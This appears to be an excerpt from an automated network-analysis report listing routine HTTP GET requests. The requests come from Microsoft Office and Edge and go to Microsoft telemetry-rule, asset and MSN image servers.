                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AA1cLbwq?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AA1sFuPI?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AAtK5aP?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BB18CMuA?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
